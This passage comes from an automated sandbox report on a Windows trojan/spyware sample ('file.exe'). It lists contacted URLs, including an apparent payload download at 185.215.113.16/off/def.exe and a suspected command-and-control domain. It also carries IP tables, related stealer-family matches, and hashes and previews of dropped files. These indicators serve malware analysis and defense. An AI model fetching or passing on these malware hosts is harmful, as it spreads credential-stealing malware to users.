                                                                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.1409650978.0000000005BD8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://octokit.github.io/rest.js/#throttlingchromecache_94.7.dr, chromecache_106.7.drfalse
                                                                                                                                    high
                                                                                                                                    https://property-imper.sbs/apiOfile.exe, 00000000.00000003.1516364900.000000000137F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9efile.exe, 00000000.00000003.1410860155.0000000005B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgfile.exe, 00000000.00000003.1410860155.0000000005B91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://github.com/js-cookie/js-cookiechromecache_94.7.dr, chromecache_106.7.drfalse
                                                                                                                                          high
                                                                                                                                          https://property-imper.sbs/api6file.exe, 00000000.00000003.1435872175.000000000139A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1435855496.000000000138E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          unknown
                                                                                                                                          http://185.215.113.16/off/def.exefile.exe, file.exe, 00000000.00000003.1618123496.0000000001373000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1723527128.0000000001332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schema.org/Organizationchromecache_114.7.drfalse
                                                                                                                                              high
                                                                                                                                              https://channel9.msdn.com/chromecache_94.7.dr, chromecache_106.7.drfalse
                                                                                                                                                high
                                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1364378704.0000000005BDC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1364456252.0000000005BDA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://github.com/dotnet/trychromecache_94.7.dr, chromecache_106.7.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://property-imper.sbs/api=file.exe, 00000000.00000003.1476241587.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1516306485.00000000013A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://185.215.113.16/off/def.exe(wfile.exe, 00000000.00000003.1618123496.0000000001373000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1723527128.0000000001332000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                    13.107.246.63
                                                                                                                                                    s-part-0035.t-0009.t-msedge.netUnited States
                                                                                                                                                    8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                    185.215.113.16
                                                                                                                                                    unknownPortugal
                                                                                                                                                    206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                    142.250.181.100
                                                                                                                                                    www.google.comUnited States
                                                                                                                                                    15169GOOGLEUSfalse
                                                                                                                                                    239.255.255.250
                                                                                                                                                    unknownReserved
                                                                                                                                                    unknownunknownfalse
                                                                                                                                                    104.21.33.116
                                                                                                                                                    property-imper.sbsUnited States
                                                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                                                    IP
                                                                                                                                                    192.168.2.7
                                                                                                                                                    192.168.2.23
                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                    Analysis ID:1561691
                                                                                                                                                    Start date and time:2024-11-24 05:10:13 +01:00
                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 7m 18s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:full
                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                    Number of analysed new started processes analysed:13
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Sample name:file.exe
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@24/64@11/7
                                                                                                                                                    EGA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    HCA Information:Failed
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 199.232.214.172, 23.56.206.247, 184.30.17.189, 172.217.17.46, 74.125.205.84, 172.217.19.227, 2.20.41.214, 34.104.35.123, 20.42.73.26, 172.217.17.74, 142.250.181.106, 172.217.17.42, 172.217.19.234, 142.250.181.10, 172.217.19.202, 142.250.181.138, 172.217.19.170, 142.250.181.74, 172.217.19.10, 23.32.238.130, 2.19.198.56, 13.74.129.1, 13.107.21.237, 204.79.197.237, 172.217.17.35
                                                                                                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, time.windows.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, onedscolprdeus09.eastus.cloudapp.azure.com, update.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, c-bing-com.dual-a-0034.a-msedge.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, browser.events.data.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, c.bing.com, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, dual-a-0034.a-msedge.net, clients.l.google.com, c1.micr
                                                                                                                                                    • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                    • VT rate limit hit for: file.exe
                                                                                                                                                    TimeTypeDescription
                                                                                                                                                    23:11:19API Interceptor46x Sleep call for process: file.exe modified
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    13.107.246.63file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                            CZxDiTktSY.exeGet hashmaliciousXWormBrowse
                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                    http://elizgallery.com/js.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        185.215.113.16file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                        • 185.215.113.16/mine/random.exe
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                        • 185.215.113.16/mine/random.exe
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                        • 185.215.113.16/mine/random.exe
                                                                                                                                                                        2fQ8fpTWAP.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        property-imper.sbsfile.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 172.67.162.84
                                                                                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        2fQ8fpTWAP.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                        • 172.67.162.84
                                                                                                                                                                        s-part-0035.t-0009.t-msedge.netfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        4yOuoT4GFy.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        CZxDiTktSY.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                        • 172.65.2.111
                                                                                                                                                                        powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                        • 172.66.116.184
                                                                                                                                                                        x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                        • 1.8.81.73
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                        • 104.29.231.51
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        MICROSOFT-CORP-MSN-AS-BLOCKUSx86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                        • 21.63.240.220
                                                                                                                                                                        sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                        • 22.48.158.87
                                                                                                                                                                        file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                        • 94.245.104.56
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                        • 20.96.153.111
                                                                                                                                                                        mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                        • 52.178.243.172
                                                                                                                                                                        sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                        • 52.169.151.115
                                                                                                                                                                        arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                        • 51.140.216.20
                                                                                                                                                                        powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                        • 72.147.99.1
                                                                                                                                                                        arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                        • 51.53.14.94
                                                                                                                                                                        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                        • 21.199.87.5
                                                                                                                                                                        WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                        • 185.215.113.206
                                                                                                                                                                        file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                        • 185.215.113.43
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                        • 185.215.113.206
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 185.215.113.16
                                                                                                                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                        • 185.215.113.206
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                        • 185.215.113.206
                                                                                                                                                                        file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                        • 185.215.113.43
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 185.215.113.16
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 185.215.113.16
                                                                                                                                                                        file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                        • 185.215.113.206
                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        28a2c9bd18a11de089ef85a160da29e4file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                        • 4.175.87.197
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        • 184.30.17.174
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                        • 4.175.87.197
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        • 184.30.17.174
                                                                                                                                                                        4yOuoT4GFy.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                        • 4.175.87.197
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        • 184.30.17.174
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 4.175.87.197
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        • 184.30.17.174
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                        • 4.175.87.197
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        • 184.30.17.174
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 4.175.87.197
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        • 184.30.17.174
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 4.175.87.197
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        • 184.30.17.174
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                        • 4.175.87.197
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        • 184.30.17.174
                                                                                                                                                                        https://lifetraces.org/spo/priv/auth/login.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 4.175.87.197
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        • 184.30.17.174
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                        • 4.175.87.197
                                                                                                                                                                        • 13.107.246.63
                                                                                                                                                                        • 184.30.17.174
                                                                                                                                                                        a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        file.exeGet hashmaliciousCryptbotBrowse
                                                                                                                                                                        • 104.21.33.116
                                                                                                                                                                        No context
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):64291
                                                                                                                                                                        Entropy (8bit):7.964191793580486
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                        MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                        SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                        SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                        SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:low
                                                                                                                                                                        Preview:......JFIF..............ICC_PROFILE............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6...C....................................................................C............................................................................"..........................................\......................!1..A.Qaq......".....#23BR......56Urst....$%4ST....&CDbcd......EFV.u...................................[...........................!1.AQR...."2Saq.......Ts.......#356BCDUbr.....%&47c.....$'Et..............?...j.....'Gu..7.=......8. ..nh..F.....y ..=....1L\U.+.Pj.RnI.(...N.{%].b..J..r...W[
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):35005
                                                                                                                                                                        Entropy (8bit):7.980061050467981
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:768:aHBEr/QXnbCgWotMq4AZZivq2/Qu0cEv1FjHBep6U0Z/68R:ahWqbTWiM7ACvdIdldhep4rR
                                                                                                                                                                        MD5:522037F008E03C9448AE0AAAF09E93CB
                                                                                                                                                                        SHA1:8A32997EAB79246BEED5A37DB0C92FBFB006BEF2
                                                                                                                                                                        SHA-256:983C35607C4FB0B529CA732BE42115D3FCAAC947CEE9C9632F7CACDBDECAF5A7
                                                                                                                                                                        SHA-512:643EC613B2E7BDBB2F61E1799C189B0E3392EA5AE10845EB0B1F1542A03569E886F4B54D5B38AF10E78DB49C71357108C94589474B181F6A4573B86CF2D6F0D8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/app-could-not-be-started.png
                                                                                                                                                                        Preview:.PNG........IHDR..............[.U....sRGB.........gAMA......a.....pHYs..........+.....RIDATx^..`........B hpwww(PJ....R.B.....K[j....@ H ..r:...].P._.`...K.ffg.v.ygf.TM.4.m...`.D".H$......"##..2e.X.t..Y".H$...d..PK.V".H$..uVm.,.H$.....b+.H$.I-#.V".H$.ZF..D".H$...[.D".Hj.)...D"..2Rl%..D".e..J$..DR.H..H$.....b+.H$..9..Neee.X,.B.\/.....o.b+.H$..9...q...EHU*....p.....=z....b.7.q..........N.. ....cUAX.9...m'_...2.`.g{...4.H.9.p.4...K ^.....`.|.n*..]..m..`W..W.H.~..|.^.a..K.6......_....K..w....9......^.....&...R....[...w..Ix=.:..^/..Epp0.5.....QRR...l....S.b.5.c.6...5..8.\....z...I......&.>....../.{.=...]'c......[.E`@Cg......Z.....c.f..,.y|,.{.o@.j..2..:.&l4.{.]Ll.N.0..b:b...g.n.........I...Ewc....[..,i`v......F...il|.c,{.-.....%BP.U........y.x....6..E2..n.W...J .*..`..r....F....#BCC......|.L&........O...'........\.....;...q.n$...7...ga..x....)..A...0.{1..'1../...+yRC...W.-..b..c0dDG...U[po....2eG.G.../.@........h.:.k?.......Q...
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):4897
                                                                                                                                                                        Entropy (8bit):4.8007377074457604
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                        MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                        SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                        SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                        SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                        Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):72
                                                                                                                                                                        Entropy (8bit):4.241202481433726
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                        MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                        SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                        SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                        SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:{"Message":"The requested resource does not support http method 'GET'."}
                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1528x402, components 3
                                                                                                                                                                        Category:downloaded
                                                                                                                                                                        Size (bytes):64291
                                                                                                                                                                        Entropy (8bit):7.964191793580486
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:NHnitWEy8ugr5KeKvJx4FqzmYyIf52YHcd/HpQxhSoywkY8+N4U4Bv:NHitHyJTeysFqiYyIfEYHchQWoywkY8v
                                                                                                                                                                        MD5:8CCB0248B7F2ABEEAD74C057232DF42A
                                                                                                                                                                        SHA1:C02BD92FEA2DF7ED12C8013B161670B39E1EC52F
                                                                                                                                                                        SHA-256:0A9FD0C7F32EABBB2834854C655B958EC72A321F3C1CF50035DD87816591CDCC
                                                                                                                                                                        SHA-512:6D6E3C858886C9D6186AD13B94DBC2D67918AA477FB7D70A7140223FAB435CF109537C51CA7F4B2A0DB00EEAD806BBE8C6B29B947B0BE7044358D2823F5057CE
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        URL:https://learn.microsoft.com/en-us/media/event-banners/banner-learn-challenge-2024.jpg
